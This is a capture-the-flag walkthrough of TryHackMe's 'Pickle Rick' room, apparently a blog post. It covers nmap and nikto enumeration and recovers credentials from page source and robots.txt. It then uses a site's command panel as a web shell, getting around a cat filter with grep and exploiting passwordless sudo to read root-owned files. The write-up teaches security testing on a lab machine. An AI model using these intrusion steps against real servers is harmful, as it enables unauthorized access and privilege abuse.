TryHackMe | Pickle Rick Walkthrough

Jon Headley
6 min read · Jun 10, 2022


A Rick and Morty CTF. Help turn Rick back into a human!

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Pickle Rick is a “Difficulty: Easy”, CTF style TryHackMe room with the objective of finding 3 ingredients needed to turn Rick back into a human. The description in the room doesn’t offer many hints except that we are exploiting a webserver. With only that to go on, let’s start our enumeration!

Let’s start off with basic enumeration to see what we’re dealing with:

nmap -sV -sC -oN init_enum $ip
# -sV: to find service and service version information
# -sC: to run the default nmap LSE scripts
# -oN init_enum: to output to a file for future reference
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b1:56:c4:7c:95:65:2e:d7:76:15:8f:8f:ce:8d:5b:65 (RSA)
| 256 41:f8:e2:bf:37:52:d0:1f:54:c7:e4:db:94:14:6c:a1 (ECDSA)
|_ 256 7d:2d:46:7f:64:5b:a6:fb:d5:4e:ab:d2:ed:c3:be:2a (EdDSA)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
MAC Address: 02:AA:55:C2:13:A1 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We knew from the room description that we were dealing with a webserver, so port 80 being open isn’t surprising. We also see ssh (port 22) is open, but without a username and password that’s not going to take us far. Before we open up the IP address in a browser to view the website, let’s do some further enumeration using nikto:

$ nikto -h http://$ip/
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x426 0x5818ccf125686
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 7 item(s) reported on remote host

Two things stick out in the output above. First, it’s interesting that there aren’t any ‘disallow’ entries in robots.txt. We should always check the robots.txt file during enumeration, so:

# Since robots.txt is simply a text file, I grabbed it using
# curl from the command line:
$ curl $ip/robots.txt
Wubbalubbadubdub

This is definitely not a “standard” robots.txt, so let’s make a note of this.

Next, nikto has found a login page (/login.php) for us.

To continue our research, let’s load http://$ip/ in a web browser and see what we can find in the source code. I prefer to view the page source in a new tab by using “ctrl + u”:

The first thing to notice is the “assets” directory. If you navigate to http://<ip>/assets/ you’ll see a list of image, js and css files. The js and css files seem to be standard files and it’s unlikely any hidden data is in the image files. There’s not much to go on here. Further down we can see a helpful little note that Rick left himself…a username!
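Checking page source for comments like this can also be done from the command line. Here’s a minimal sketch; the HTML below is a stand-in for the room’s actual page source, and against the live target you’d pipe `curl -s http://$ip/` into the same grep:

```shell
# Sketch: pull HTML comments out of a page without a browser.
# The sample page is hypothetical, not the room's real source.
page='<html><body><!-- Note to self, remember username! Username: R1ckRul3s --></body></html>'
printf '%s\n' "$page" | grep -o '<!--.*-->'
```

`grep -o` prints only the matched portion, so any developer comment pops out on its own line instead of being buried in the markup.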

So far, we’ve discovered a login.php page, a username (“R1ckRul3s”), and a generic text string (“Wubbalubbadubdub”). Using these credentials, we successfully log in to the “Rick Portal” at /portal.php!

Here we see a “Command Panel” along with some additional tabs at the top. Unfortunately, the other tabs are pages that only the “REAL” Rick can see, which doesn’t help us. Playing around with the input field by throwing in some common Linux commands, we find that it is some sort of web shell that runs Linux commands and prints their output to the screen. Let’s input a few commands to see who/where we are:

# I'm running these commands in the input field. I'm typing them
# here for brevity instead of pasting a bunch of pictures.
$ whoami
$ pwd
$ sudo -l # list sudo privileges
Matching Defaults entries for www-data on
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
$ ls -l
total 32
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4096 Feb 10 2019 assets
-rwxr-xr-x 1 ubuntu ubuntu 54 Feb 10 2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1105 Feb 10 2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1062 Feb 10 2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1438 Feb 10 2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2044 Feb 10 2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 robots.txt

GASP…it seems this user can run all commands via sudo WITHOUT a password! So, basically we can do whatever we want! But, we’re just trying to find the 3 ingredients to help Rick turn back into a human as quickly as possible, so let’s just try to find those without doing anything crazy…
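For reference, this kind of passwordless root access usually comes from a sudoers entry along these lines (illustrative only — I didn’t read the box’s actual /etc/sudoers):

```
# Illustrative /etc/sudoers line, NOT taken from the machine itself:
# user      hosts=(run-as)  tag:      commands
www-data    ALL=(ALL)       NOPASSWD: ALL
```

The NOPASSWD tag is what lets www-data skip password authentication entirely.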

If we list the files in the working directory of the “Command Panel”, we see two interesting files: Sup3rS3cretPickl3Ingred.txt and clue.txt. Let’s try to use the web shell to print the contents of these files by running cat. Trying cat Sup3rS3cretPickl3Ingred.txt gives us an error.

It looks like the “cat” command is not allowed in our web shell. Earlier we saw that we’re in the same directory as index.html, so let’s see if we can access these files via curl:

$ curl http://$ip/Sup3rS3cretPickl3Ingred.txt
$ curl http://$ip/clue.txt
Look around the file system for the other ingredient.

Excellent! We found the first flag (sorry, gotta run it yourself to see the answer…)! Also, now we know that we need to look around the file system for the other flags. Let’s see if we can find some files in the /home and /root directories by using “find” in the “Command Panel”:

# Same as before, I'm running this command thru 
# the "Command Panel"
$ sudo find /home /root -type f
/home/rick/second ingredients
/root/3rd.txt

Looks like we found /home/rick/second\ ingredients and /root/3rd.txt. But how do we access them? The webserver won’t serve files from the /home and /root directories, and the “Command Panel” doesn’t allow the “cat” command. What if we tried “grep”?

# You know the drill...
$ sudo grep . "/home/rick/second ingredients"
$ sudo grep . "/root/3rd.txt"
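Why does this work? In grep, `.` matches any single character, so `grep . file` matches, and therefore prints, every non-empty line of the file, making it a handy stand-in for the filtered cat. A quick local demonstration (the sample file here is my own, not one from the box):

```shell
# `.` matches any character, so `grep . file` prints every
# non-empty line -- effectively a cat replacement.
printf 'line one\n\nline two\n' > /tmp/grep_demo.txt
grep . /tmp/grep_demo.txt
```

This prints “line one” and “line two” (the blank line is skipped). Other binaries like tac, head, or less can often substitute for a filtered cat in the same way.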

And there we have it! We were able to find all 3 ingredients using various methods. Let’s recap:

  • The web shell didn’t properly sanitize the available commands, allowing command injection. We were able to print file contents to the screen using this technique.
  • Sensitive information was carelessly left in publicly accessible places: a username in a webpage source-code comment and a password in the robots.txt file. A file containing the first ingredient was also directly accessible.
  • A sudo misconfiguration allowed the web shell’s “www-data” user to run any command as root without a password. This allowed us to find the ingredients in the /root and /home/rick directories.

I’m very glad you’ve taken the time to read my walkthrough. I hope it was helpful for you in discovering new ways to capture flags and test the security of applications. Please leave a comment if you found other avenues for this TryHackMe room!




Jon Headley

From Electrical Engineering to officer in the Air Force to copier salesman to network engineer to python developer to cybersecurity…where will I go next?